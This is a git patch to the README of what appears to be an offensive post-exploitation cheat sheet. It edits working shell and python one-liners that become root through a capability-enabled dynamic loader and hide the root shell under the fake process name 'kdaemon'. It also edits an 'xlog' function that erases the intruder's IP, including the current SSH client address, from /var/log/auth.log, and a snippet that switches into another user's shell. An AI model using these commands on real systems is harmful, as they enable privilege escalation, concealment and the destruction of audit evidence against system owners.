From 2b618ece6753e7036ebcd742860622b58c458ff6 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 15 Jun 2024 19:37:00 +0100
Subject: [PATCH] Update README.md

---
 README.md | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 50993b0..58b1ca6 100644
--- a/README.md
+++ b/README.md
@@ -1612,7 +1612,7 @@ setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
 Become root
 ```bash
 ### Execute as non-root user
-/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
+exec /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")'
 ```
 
 <a id="implant"></a>
@@ -1762,6 +1762,10 @@ This will reset the logfile to 0 without having to restart syslogd etc:
 This will remove any line containing the IP `1.2.3.4` from the log file:
 ```sh
 xlog() { local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"; }
+```
+
+Examples:
+```sh
 # xlog "1\.2\.3\.4" /var/log/auth.log
 # xlog "${SSH_CLIENT%% *}" /var/log/auth.log
 # xlog "^2023.* thc\.org" foo.log
@@ -1813,7 +1817,7 @@ Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | conv
 NAME="UserName"  ### <-- Set UserName
 U=$(id -u ${NAME:?}) \
 && H="$(grep "$U" /etc/passwd | cut -d: -f6)" \
-&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')"
+&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', '-bash')"
 # change -bash to bash to not make this a login shell.
 ```